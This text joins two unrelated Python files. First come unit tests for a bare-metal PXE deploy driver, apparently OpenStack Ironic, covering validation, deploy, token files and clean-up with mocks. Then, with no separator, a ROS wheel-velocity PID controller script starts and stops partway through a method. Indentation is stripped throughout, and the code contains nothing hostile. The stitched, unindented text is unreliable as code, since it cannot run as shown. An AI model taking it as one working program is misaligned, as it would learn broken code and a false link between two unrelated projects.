self.assertRaises(exception.MissingParameterValue,
task.driver.deploy.validate,
task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_glance_image_doesnt_exists(self, mock_glance):
mock_glance.side_effect = exception.ImageNotFound('not found')
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_glance_conn_problem(self, mock_glance):
exceptions = (exception.GlanceConnectionFailed('connection fail'),
exception.ImageNotAuthorized('not authorized'),
exception.Invalid('invalid'))
mock_glance.side_effect = exceptions
for exc in exceptions:
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_invalid_root_device_hints(self, mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
def test_vendor_passthru_validate_good(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.vendor.validate(task, method='pass_deploy_info',
address='123456', iqn='aaa-bbb',
key='fake-56789')
def test_vendor_passthru_validate_fail(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, method='pass_deploy_info',
key='fake-56789')
def test_vendor_passthru_validate_key_notmatch(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, method='pass_deploy_info',
address='123456', iqn='aaa-bbb',
key='fake-12345')
@mock.patch.object(iscsi_deploy, 'validate_pass_bootloader_info_input',
autospec=True)
def test_vendor_passthru_pass_bootloader_install_info(self,
validate_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
kwargs = {'address': '1.2.3.4', 'key': 'fake-key',
'status': 'SUCCEEDED', 'error': ''}
task.driver.vendor.validate(
task, method='pass_bootloader_install_info', **kwargs)
validate_mock.assert_called_once_with(task, kwargs)
@mock.patch.object(iscsi_deploy, 'validate_bootloader_install_status',
autospec=True)
@mock.patch.object(iscsi_deploy, 'finish_deploy', autospec=True)
def test_pass_bootloader_install_info(self, finish_deploy_mock,
validate_input_mock):
kwargs = {'method': 'pass_deploy_info', 'address': '123456'}
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.vendor.pass_bootloader_install_info(task, **kwargs)
finish_deploy_mock.assert_called_once_with(task, '123456')
validate_input_mock.assert_called_once_with(task, kwargs)
@mock.patch.object(pxe, '_get_image_info')
@mock.patch.object(pxe, '_cache_ramdisk_kernel')
@mock.patch.object(pxe, '_build_pxe_config_options')
@mock.patch.object(pxe_utils, 'create_pxe_config')
def test_prepare(self, mock_pxe_config,
mock_build_pxe, mock_cache_r_k,
mock_img_info):
mock_build_pxe.return_value = None
mock_img_info.return_value = None
mock_pxe_config.return_value = None
mock_cache_r_k.return_value = None
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.deploy.prepare(task)
mock_img_info.assert_called_once_with(task.node,
self.context)
mock_pxe_config.assert_called_once_with(
task, None, CONF.pxe.pxe_config_template)
mock_cache_r_k.assert_called_once_with(self.context,
task.node, None)
@mock.patch.object(pxe, '_get_image_info')
@mock.patch.object(pxe, '_cache_ramdisk_kernel')
@mock.patch.object(pxe, '_build_pxe_config_options')
@mock.patch.object(pxe_utils, 'create_pxe_config')
@mock.patch.object(pxe_utils, 'get_pxe_config_file_path')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
def test_prepare_node_active_missing_root_uuid(self,
mock_switch,
mock_pxe_get_cfg,
mock_pxe_config,
mock_build_pxe,
mock_cache_r_k,
mock_img_info):
mock_build_pxe.return_value = None
mock_img_info.return_value = None
self.node.provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.deploy.prepare(task)
mock_img_info.assert_called_once_with(task.node,
self.context)
mock_pxe_config.assert_called_once_with(
task, None, CONF.pxe.pxe_config_template)
mock_cache_r_k.assert_called_once_with(self.context,
task.node, None)
self.assertFalse(mock_pxe_get_cfg.called)
self.assertFalse(mock_switch.called)
@mock.patch.object(pxe, '_get_image_info')
@mock.patch.object(pxe, '_cache_ramdisk_kernel')
@mock.patch.object(pxe, '_build_pxe_config_options')
@mock.patch.object(pxe_utils, 'create_pxe_config')
@mock.patch.object(pxe_utils, 'get_pxe_config_file_path')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(driver_utils, 'get_node_capability')
def _test_prepare_node_active(self,
mock_get_cap,
mock_switch,
mock_pxe_get_cfg,
mock_pxe_config,
mock_build_pxe,
mock_cache_r_k,
mock_img_info):
mock_build_pxe.return_value = None
mock_img_info.return_value = None
mock_pxe_get_cfg.return_value = '/path'
mock_get_cap.return_value = None
self.node.provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.deploy.prepare(task)
mock_img_info.assert_called_once_with(task.node,
self.context)
mock_pxe_config.assert_called_once_with(
task, None, CONF.pxe.pxe_config_template)
mock_cache_r_k.assert_called_once_with(self.context,
task.node, None)
mock_pxe_get_cfg.assert_called_once_with(task.node.uuid)
iwdi = task.node.driver_internal_info.get('is_whole_disk_image')
mock_switch.assert_called_once_with('/path', 'abcd', None, iwdi)
def test_prepare_node_active(self):
self.node.driver_internal_info = {'root_uuid_or_disk_id': 'abcd',
'is_whole_disk_image': False}
self.node.save()
self._test_prepare_node_active()
def test_prepare_node_active_without_is_whole_disk_image(self):
self.node.driver_internal_info = {'root_uuid_or_disk_id': 'abcd'}
self.node.save()
self._test_prepare_node_active()
@mock.patch.object(keystone, 'token_expires_soon')
@mock.patch.object(deploy_utils, 'get_image_mb')
@mock.patch.object(iscsi_deploy, '_get_image_file_path')
@mock.patch.object(iscsi_deploy, 'cache_instance_image')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
@mock.patch.object(manager_utils, 'node_power_action')
@mock.patch.object(manager_utils, 'node_set_boot_device')
def test_deploy(self, mock_node_set_boot, mock_node_power_action,
mock_update_dhcp, mock_cache_instance_image,
mock_get_image_file_path, mock_get_image_mb, mock_expire):
fake_img_path = '/test/path/test.img'
mock_get_image_file_path.return_value = fake_img_path
mock_get_image_mb.return_value = 1
mock_expire.return_value = False
self.config(deploy_callback_timeout=600, group='conductor')
with task_manager.acquire(self.context,
self.node.uuid, shared=False) as task:
dhcp_opts = pxe_utils.dhcp_options_for_instance(task)
state = task.driver.deploy.deploy(task)
self.assertEqual(state, states.DEPLOYWAIT)
mock_cache_instance_image.assert_called_once_with(
self.context, task.node)
mock_get_image_file_path.assert_called_once_with(task.node.uuid)
mock_get_image_mb.assert_called_once_with(fake_img_path)
mock_update_dhcp.assert_called_once_with(task, dhcp_opts)
mock_expire.assert_called_once_with(self.context.auth_token, 600)
mock_node_set_boot.assert_called_once_with(task, 'pxe',
persistent=True)
mock_node_power_action.assert_called_once_with(task, states.REBOOT)
# ensure token file created
t_path = pxe._get_token_file_path(self.node.uuid)
token = open(t_path, 'r').read()
self.assertEqual(self.context.auth_token, token)
@mock.patch.object(keystone, 'get_admin_auth_token')
@mock.patch.object(keystone, 'token_expires_soon')
@mock.patch.object(deploy_utils, 'get_image_mb')
@mock.patch.object(iscsi_deploy, '_get_image_file_path')
@mock.patch.object(iscsi_deploy, 'cache_instance_image')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
@mock.patch.object(manager_utils, 'node_power_action')
@mock.patch.object(manager_utils, 'node_set_boot_device')
def test_deploy_token_near_expiration(self, mock_node_set_boot,
mock_node_power_action, mock_update_dhcp,
mock_cache_instance_image, mock_get_image_file_path,
mock_get_image_mb, mock_expire, mock_admin_token):
mock_get_image_mb.return_value = 1
mock_expire.return_value = True
new_token = 'new_admin_token'
mock_admin_token.return_value = new_token
self.config(deploy_callback_timeout=600, group='conductor')
with task_manager.acquire(self.context,
self.node.uuid, shared=False) as task:
task.driver.deploy.deploy(task)
mock_expire.assert_called_once_with(self.context.auth_token, 600)
mock_admin_token.assert_called_once_with()
# ensure token file created with new token
t_path = pxe._get_token_file_path(self.node.uuid)
token = open(t_path, 'r').read()
self.assertEqual(new_token, token)
@mock.patch.object(deploy_utils, 'get_image_mb')
@mock.patch.object(iscsi_deploy, '_get_image_file_path')
@mock.patch.object(iscsi_deploy, 'cache_instance_image')
def test_deploy_image_too_large(self, mock_cache_instance_image,
mock_get_image_file_path,
mock_get_image_mb):
fake_img_path = '/test/path/test.img'
mock_get_image_file_path.return_value = fake_img_path
mock_get_image_mb.return_value = 999999
with task_manager.acquire(self.context,
self.node.uuid, shared=False) as task:
self.assertRaises(exception.InstanceDeployFailure,
task.driver.deploy.deploy, task)
mock_cache_instance_image.assert_called_once_with(
self.context, task.node)
mock_get_image_file_path.assert_called_once_with(task.node.uuid)
mock_get_image_mb.assert_called_once_with(fake_img_path)
@mock.patch.object(manager_utils, 'node_power_action')
def test_tear_down(self, node_power_mock):
with task_manager.acquire(self.context,
self.node.uuid) as task:
state = task.driver.deploy.tear_down(task)
self.assertEqual(states.DELETED, state)
node_power_mock.assert_called_once_with(task, states.POWER_OFF)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
def test_take_over(self, update_dhcp_mock, clean_pxe_mock):
with task_manager.acquire(
self.context, self.node.uuid, shared=True) as task:
dhcp_opts = pxe_utils.dhcp_options_for_instance(task)
task.driver.deploy.take_over(task)
# Assert we update the DHCP server
update_dhcp_mock.assert_called_once_with(task, dhcp_opts)
# Assert we don't clean the PXE config files in
# case it's not local boot
self.assertFalse(clean_pxe_mock.called)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(dhcp_factory.DHCPFactory, 'update_dhcp')
def test_take_over_localboot(self, update_dhcp_mock, clean_pxe_mock):
with task_manager.acquire(
self.context, self.node.uuid, shared=True) as task:
task.node.instance_info['capabilities'] = {"boot_option": "local"}
task.driver.deploy.take_over(task)
# Assert we are not attempting to update the DHCP
# server in case it's local boot
self.assertFalse(update_dhcp_mock.called)
# Assert we are cleaning the PXE config files
clean_pxe_mock.assert_called_once_with(task)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(manager_utils, 'node_set_boot_device')
@mock.patch.object(deploy_utils, 'notify_ramdisk_to_proceed')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(iscsi_deploy, 'InstanceImageCache')
@mock.patch.object(deploy_utils, 'deploy_partition_image')
def _test_pass_deploy_info_deploy(self, is_localboot, mock_deploy,
mock_image_cache, mock_switch_config,
notify_mock, mock_node_boot_dev,
mock_clean_pxe):
token_path = self._create_token_file()
# set local boot
if is_localboot:
i_info = self.node.instance_info
i_info['capabilities'] = '{"boot_option": "local"}'
self.node.instance_info = i_info
self.node.power_state = states.POWER_ON
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
root_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
mock_deploy.return_value = {'root uuid': root_uuid}
boot_mode = None
is_whole_disk_image = False
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.vendor.pass_deploy_info(
task, address='123456', iqn='aaa-bbb', key='fake-56789')
self.node.refresh()
self.assertEqual(states.POWER_ON, self.node.power_state)
self.assertIn('root_uuid_or_disk_id', self.node.driver_internal_info)
self.assertIsNone(self.node.last_error)
self.assertFalse(os.path.exists(token_path))
mock_image_cache.assert_called_once_with()
mock_image_cache.return_value.clean_up.assert_called_once_with()
pxe_config_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
notify_mock.assert_called_once_with('123456')
if is_localboot:
mock_node_boot_dev.assert_called_once_with(
mock.ANY, boot_devices.DISK, persistent=True)
mock_clean_pxe.assert_called_once_with(mock.ANY)
self.assertFalse(mock_switch_config.called)
else:
mock_switch_config.assert_called_once_with(pxe_config_path,
root_uuid,
boot_mode,
is_whole_disk_image)
self.assertFalse(mock_node_boot_dev.called)
self.assertFalse(mock_clean_pxe.called)
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(manager_utils, 'node_set_boot_device')
@mock.patch.object(deploy_utils, 'notify_ramdisk_to_proceed')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(iscsi_deploy, 'InstanceImageCache')
@mock.patch.object(deploy_utils, 'deploy_disk_image')
def _test_pass_deploy_info_whole_disk_image(self, is_localboot,
mock_deploy,
mock_image_cache,
mock_switch_config,
notify_mock,
mock_node_boot_dev,
mock_clean_pxe):
token_path = self._create_token_file()
# set local boot
if is_localboot:
i_info = self.node.instance_info
i_info['capabilities'] = '{"boot_option": "local"}'
self.node.instance_info = i_info
self.node.power_state = states.POWER_ON
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
boot_mode = None
is_whole_disk_image = True
disk_id = '0x12345678'
mock_deploy.return_value = {'disk identifier': disk_id}
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.vendor.pass_deploy_info(task, address='123456',
iqn='aaa-bbb',
key='fake-56789')
self.node.refresh()
self.assertEqual(states.POWER_ON, self.node.power_state)
self.assertIsNone(self.node.last_error)
self.assertFalse(os.path.exists(token_path))
mock_image_cache.assert_called_once_with()
mock_image_cache.return_value.clean_up.assert_called_once_with()
pxe_config_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
notify_mock.assert_called_once_with('123456')
if is_localboot:
mock_node_boot_dev.assert_called_once_with(
mock.ANY, boot_devices.DISK, persistent=True)
mock_clean_pxe.assert_called_once_with(mock.ANY)
self.assertFalse(mock_switch_config.called)
else:
mock_switch_config.assert_called_once_with(pxe_config_path,
disk_id,
boot_mode,
is_whole_disk_image)
self.assertFalse(mock_node_boot_dev.called)
self.assertFalse(mock_clean_pxe.called)
def test_pass_deploy_info_deploy(self):
self._test_pass_deploy_info_deploy(False)
self.assertEqual(states.ACTIVE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
def test_pass_deploy_info_localboot(self):
self._test_pass_deploy_info_deploy(True)
self.assertEqual(states.DEPLOYWAIT, self.node.provision_state)
self.assertEqual(states.ACTIVE, self.node.target_provision_state)
def test_pass_deploy_info_whole_disk_image(self):
self._test_pass_deploy_info_whole_disk_image(False)
self.assertEqual(states.ACTIVE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
def test_pass_deploy_info_whole_disk_image_localboot(self):
self._test_pass_deploy_info_whole_disk_image(True)
self.assertEqual(states.ACTIVE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
def test_pass_deploy_info_invalid(self):
self.node.power_state = states.POWER_ON
self.node.provision_state = states.AVAILABLE
self.node.target_provision_state = states.NOSTATE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.InvalidState,
task.driver.vendor.pass_deploy_info,
task, address='123456', iqn='aaa-bbb',
key='fake-56789', error='test ramdisk error')
self.node.refresh()
self.assertEqual(states.AVAILABLE, self.node.provision_state)
self.assertEqual(states.NOSTATE, self.node.target_provision_state)
self.assertEqual(states.POWER_ON, self.node.power_state)
def test_lock_elevated(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
with mock.patch.object(task.driver.vendor,
'pass_deploy_info') as _cont_deploy_mock:
task.driver.vendor.pass_deploy_info(
task, address='123456', iqn='aaa-bbb', key='fake-56789')
# lock elevated w/o exception
self.assertEqual(1, _cont_deploy_mock.call_count,
"pass_deploy_info was not called once.")
def test_vendor_routes(self):
expected = ['heartbeat', 'pass_deploy_info',
'pass_bootloader_install_info']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
vendor_routes = task.driver.vendor.vendor_routes
self.assertIsInstance(vendor_routes, dict)
self.assertEqual(sorted(expected), sorted(list(vendor_routes)))
def test_driver_routes(self):
expected = ['lookup']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
driver_routes = task.driver.vendor.driver_routes
self.assertIsInstance(driver_routes, dict)
self.assertEqual(sorted(expected), sorted(list(driver_routes)))
@mock.patch.object(utils, 'unlink_without_raise')
@mock.patch.object(iscsi_deploy, 'destroy_images')
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(pxe, 'TFTPImageCache')
@mock.patch.object(pxe, '_get_image_info')
class CleanUpTestCase(db_base.DbTestCase):
def setUp(self):
super(CleanUpTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
instance_info = INST_INFO_DICT
instance_info['deploy_key'] = 'fake-56789'
self.node = obj_utils.create_test_node(
self.context, driver='fake_pxe',
instance_info=instance_info,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
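        # NOTE: the class-level mock.patch decorators are applied bottom-up,
        # so the lowest one (pxe._get_image_info) supplies the first mock
        # argument to each test (mock_image_info) and the topmost
        # (utils.unlink_without_raise) supplies the last (mock_unlink).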
def test_clean_up(self, mock_image_info, mock_cache, mock_pxe_clean,
mock_iscsi_clean, mock_unlink):
mock_image_info.return_value = {'label': ['', 'deploy_kernel']}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.clean_up(task)
mock_image_info.assert_called_once_with(task.node,
task.context)
mock_pxe_clean.assert_called_once_with(task)
mock_unlink.assert_any_call('deploy_kernel')
mock_unlink.assert_any_call(pxe._get_token_file_path(
task.node.uuid))
mock_iscsi_clean.assert_called_once_with(task.node.uuid)
mock_cache.return_value.clean_up.assert_called_once_with()
def test_clean_up_fail_get_image_info(self, mock_image_info, mock_cache,
mock_pxe_clean, mock_iscsi_clean,
mock_unlink):
mock_image_info.side_effect = exception.MissingParameterValue('foo')
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.clean_up(task)
mock_image_info.assert_called_once_with(task.node,
task.context)
mock_pxe_clean.assert_called_once_with(task)
mock_unlink.assert_called_once_with(pxe._get_token_file_path(
task.node.uuid))
mock_iscsi_clean.assert_called_once_with(task.node.uuid)
mock_cache.return_value.clean_up.assert_called_once_with()
class CleanUpFullFlowTestCase(db_base.DbTestCase):
def setUp(self):
super(CleanUpFullFlowTestCase, self).setUp()
self.config(image_cache_size=0, group='pxe')
# Configure node
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
instance_info = INST_INFO_DICT
instance_info['deploy_key'] = 'fake-56789'
self.node = obj_utils.create_test_node(
self.context, driver='fake_pxe',
instance_info=instance_info,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
# Configure temporary directories
pxe_temp_dir = tempfile.mkdtemp()
self.config(tftp_root=pxe_temp_dir, group='pxe')
tftp_master_dir = os.path.join(CONF.pxe.tftp_root,
'tftp_master')
self.config(tftp_master_path=tftp_master_dir, group='pxe')
os.makedirs(tftp_master_dir)
instance_temp_dir = tempfile.mkdtemp()
self.config(images_path=instance_temp_dir,
group='pxe')
instance_master_dir = os.path.join(CONF.pxe.images_path,
'instance_master')
self.config(instance_master_path=instance_master_dir,
group='pxe')
os.makedirs(instance_master_dir)
self.pxe_config_dir = os.path.join(CONF.pxe.tftp_root, 'pxelinux.cfg')
os.makedirs(self.pxe_config_dir)
# Populate some file names
self.master_kernel_path = os.path.join(CONF.pxe.tftp_master_path,
'kernel')
self.master_instance_path = os.path.join(CONF.pxe.instance_master_path,
'image_uuid')
self.node_tftp_dir = os.path.join(CONF.pxe.tftp_root,
self.node.uuid)
os.makedirs(self.node_tftp_dir)
self.kernel_path = os.path.join(self.node_tftp_dir,
'kernel')
self.node_image_dir = iscsi_deploy._get_image_dir_path(self.node.uuid)
os.makedirs(self.node_image_dir)
self.image_path = iscsi_deploy._get_image_file_path(self.node.uuid)
self.config_path = pxe_utils.get_pxe_config_file_path(self.node.uuid)
self.mac_path = pxe_utils._get_pxe_mac_path(self.port.address)
self.token_path = pxe._get_token_file_path(self.node.uuid)
# Create files
self.files = [self.config_path, self.master_kernel_path,
self.master_instance_path, self.token_path]
for fname in self.files:
# NOTE(dtantsur): files with 0 size won't be cleaned up
with open(fname, 'w') as fp:
fp.write('test')
os.link(self.config_path, self.mac_path)
os.link(self.master_kernel_path, self.kernel_path)
os.link(self.master_instance_path, self.image_path)
@mock.patch.object(pxe, '_get_image_info')
def test_clean_up_with_master(self, mock_get_image_info):
image_info = {'kernel': ('kernel_uuid',
self.kernel_path)}
mock_get_image_info.return_value = image_info
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.clean_up(task)
mock_get_image_info.assert_called_once_with(task.node,
task.context)
for path in ([self.kernel_path, self.image_path, self.config_path]
+ self.files):
self.assertFalse(os.path.exists(path),
'%s is not expected to exist' % path)
class TestAgentVendorPassthru(db_base.DbTestCase):
def setUp(self):
super(TestAgentVendorPassthru, self).setUp()
mgr_utils.mock_the_extension_manager()
self.driver = driver_factory.get_driver("fake")
self.driver.vendor = pxe.VendorPassthru()
self.node = obj_utils.create_test_node(
self.context, driver='fake',
instance_info=INST_INFO_DICT,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
self.node.driver_internal_info['agent_url'] = 'http://1.2.3.4:1234'
self.task = mock.Mock(spec=task_manager.TaskManager)
self.task.shared = False
self.task.node = self.node
self.task.driver = self.driver
self.task.context = self.context
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'reboot_and_finish_deploy')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(iscsi_deploy, 'do_agent_iscsi_deploy')
@mock.patch.object(pxe, '_destroy_token_file')
def test_continue_deploy_netboot(self, destroy_token_file_mock,
do_agent_iscsi_deploy_mock,
switch_pxe_config_mock,
reboot_and_finish_deploy_mock):
uuid_dict_returned = {'root uuid': 'some-root-uuid'}
do_agent_iscsi_deploy_mock.return_value = uuid_dict_returned
self.driver.vendor.continue_deploy(self.task)
destroy_token_file_mock.assert_called_once_with(self.node)
do_agent_iscsi_deploy_mock.assert_called_once_with(
self.task, self.driver.vendor._client)
tftp_config = '/tftpboot/%s/config' % self.node.uuid
switch_pxe_config_mock.assert_called_once_with(tftp_config,
'some-root-uuid',
None, False)
reboot_and_finish_deploy_mock.assert_called_once_with(self.task)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'reboot_and_finish_deploy')
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot')
@mock.patch.object(iscsi_deploy, 'do_agent_iscsi_deploy')
@mock.patch.object(pxe, '_destroy_token_file')
def test_continue_deploy_localboot(self, destroy_token_file_mock,
do_agent_iscsi_deploy_mock,
configure_local_boot_mock,
clean_up_pxe_config_mock,
reboot_and_finish_deploy_mock):
self.node.instance_info = {
'capabilities': {'boot_option': 'local'}}
self.node.save()
uuid_dict_returned = {'root uuid': 'some-root-uuid'}
do_agent_iscsi_deploy_mock.return_value = uuid_dict_returned
self.driver.vendor.continue_deploy(self.task)
destroy_token_file_mock.assert_called_once_with(self.node)
do_agent_iscsi_deploy_mock.assert_called_once_with(
self.task, self.driver.vendor._client)
configure_local_boot_mock.assert_called_once_with(
self.task, root_uuid='some-root-uuid', efi_system_part_uuid=None)
clean_up_pxe_config_mock.assert_called_once_with(self.task)
reboot_and_finish_deploy_mock.assert_called_once_with(self.task)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'reboot_and_finish_deploy')
@mock.patch.object(pxe_utils, 'clean_up_pxe_config')
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot')
@mock.patch.object(iscsi_deploy, 'do_agent_iscsi_deploy')
@mock.patch.object(pxe, '_destroy_token_file')
def test_continue_deploy_localboot_uefi(self, destroy_token_file_mock,
do_agent_iscsi_deploy_mock,
configure_local_boot_mock,
clean_up_pxe_config_mock,
reboot_and_finish_deploy_mock):
self.node.instance_info = {
'capabilities': {'boot_option': 'local'}}
self.node.save()
uuid_dict_returned = {'root uuid': 'some-root-uuid',
'efi system partition uuid': 'efi-part-uuid'}
do_agent_iscsi_deploy_mock.return_value = uuid_dict_returned
self.driver.vendor.continue_deploy(self.task)
destroy_token_file_mock.assert_called_once_with(self.node)
do_agent_iscsi_deploy_mock.assert_called_once_with(
self.task, self.driver.vendor._client)
configure_local_boot_mock.assert_called_once_with(
self.task, root_uuid='some-root-uuid',
efi_system_part_uuid='efi-part-uuid')
clean_up_pxe_config_mock.assert_called_once_with(self.task)
reboot_and_finish_deploy_mock.assert_called_once_with(self.task)
#!/usr/bin/env python
"""
pid_velocity - takes target velocities for the wheels as messages on the
wheel_vtarget topic and monitors the wheel topic for encoder feedback
Copyright (C) 2012 Jon Stephan.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import rospy
import roslib
from std_msgs.msg import Int16
from std_msgs.msg import Float32
from numpy import array
######################################################
######################################################
class PidVelocity():
######################################################
######################################################
#####################################################
def __init__(self):
#####################################################
rospy.init_node("rpid_velocity")
self.nodename = rospy.get_name()
rospy.loginfo("%s started" % self.nodename)
### initialize variables
self.target = 0
self.motor = 0
self.vel = 0
self.integral = 0
self.error = 0
self.derivative = 0
self.previous_error = 0
self.wheel_prev = 0
self.wheel_latest = 0
self.then = rospy.Time.now()
self.wheel_mult = 0
self.prev_encoder = 0
### get parameters ####
self.Kp = rospy.get_param('~Kp',10)
self.Ki = rospy.get_param('~Ki',10)
self.Kd = rospy.get_param('~Kd',0.001)
self.out_min = rospy.get_param('~out_min',-255)
self.out_max = rospy.get_param('~out_max',255)
self.rate = rospy.get_param('~rate',30)
self.rolling_pts = rospy.get_param('~rolling_pts',2)
self.timeout_ticks = rospy.get_param('~timeout_ticks',4)
self.ticks_per_meter = rospy.get_param('ticks_meter', 20)
self.vel_threshold = rospy.get_param('~vel_threshold', 0.001)
self.encoder_min = rospy.get_param('encoder_min', -32768)
self.encoder_max = rospy.get_param('encoder_max', 32768)
self.encoder_low_wrap = rospy.get_param('wheel_low_wrap', (self.encoder_max - self.encoder_min) * 0.3 + self.encoder_min )
self.encoder_high_wrap = rospy.get_param('wheel_high_wrap', (self.encoder_max - self.encoder_min) * 0.7 + self.encoder_min )
self.prev_vel = [0.0] * self.rolling_pts
self.wheel_latest = 0.0
self.prev_pid_time = rospy.Time.now()
rospy.logdebug("%s got Kp:%0.3f Ki:%0.3f Kd:%0.3f tpm:%0.3f" % (self.nodename, self.Kp, self.Ki, self.Kd, self.ticks_per_meter))
#### subscribers/publishers
rospy.Subscriber("wheel", Int16, self.wheelCallback)
rospy.Subscriber("wheel_vtarget", Float32, self.targetCallback)
self.pub_motor = rospy.Publisher('motor_cmd',Float32,queue_size=10)
self.pub_vel = rospy.Publisher('wheel_vel', Float32,queue_size=10)
#####################################################
def spin(self):
#####################################################
self.r = rospy.Rate(self.rate)
self.then = rospy.Time.now()
self.ticks_since_target = self.timeout_ticks
self.wheel_prev = self.wheel_latest
self.then = rospy.Time.now()
while not rospy.is_shutdown():
self.spinOnce()
self.r.sleep()
#####################################################
def spinOnce(self):
#####################################################
self.previous_error = 0.0
self.prev_vel = [0.0] * self.rolling_pts
self.integral = 0.0
self.error = 0.0
self.derivative = 0.0
self.vel = 0.0
        # only do the loop if we've recently received a target velocity message
while not rospy.is_shutdown() and self.ticks_since_target < self.timeout_ticks:
self.calcVelocity()
self.doPid()
self.pub_motor.publish(self.motor)
self.r.sleep()
self.ticks_since_target += 1
if self.ticks_since_target == self.timeout_ticks:
self.pub_motor.publish(0)
#####################################################
def calcVelocity(self):
#####################################################
self.dt_duration = rospy.Time.now() - self.then
self.dt = self.dt_duration.to_sec()
rospy.logdebug("-D- %s caclVelocity dt=%0.3f wheel_latest=%0.3f wheel_prev=%0.3f" % (self.nodename, self.dt, self.wheel_latest, self.wheel_prev))
if (self.wheel_latest == self.wheel_prev):
# we haven't received an updated wheel lately
cur_vel = (1 / self.ticks_per_meter) / self.dt # if we got a tick right now, this would be the velocity
if abs(cur_vel) < self.vel_threshold:
# if the velocity is < threshold, consider our velocity 0
rospy.logdebug("-D- %s below threshold cur_vel=%0.3f vel=0" % (self.nodename, cur_vel))
self.appendVel(0)
self.calcRollingVel()
else:
rospy.logdebug("-D- %s above threshold cur_vel=%0.3f" % (self.nodename, cur_vel))
if abs(cur_vel) < self.vel:
rospy.logdebug("-D- %s cur_vel < self.vel" % self.nodename)
# we know we're slower than what we're currently publishing as a velocity
self.appendVel(cur_vel)
self.calcRollingVel()
else:
# we received a new wheel value
cur_vel = (self.wheel_latest - self.wheel_prev) / self.dt
self.appendVel(cur_vel)
self.calcRollingVel()
rospy.logdebug("-D- %s **** wheel updated vel=%0.3f **** " % (self.nodename, self.vel))
self.wheel_prev = self.wheel_latest
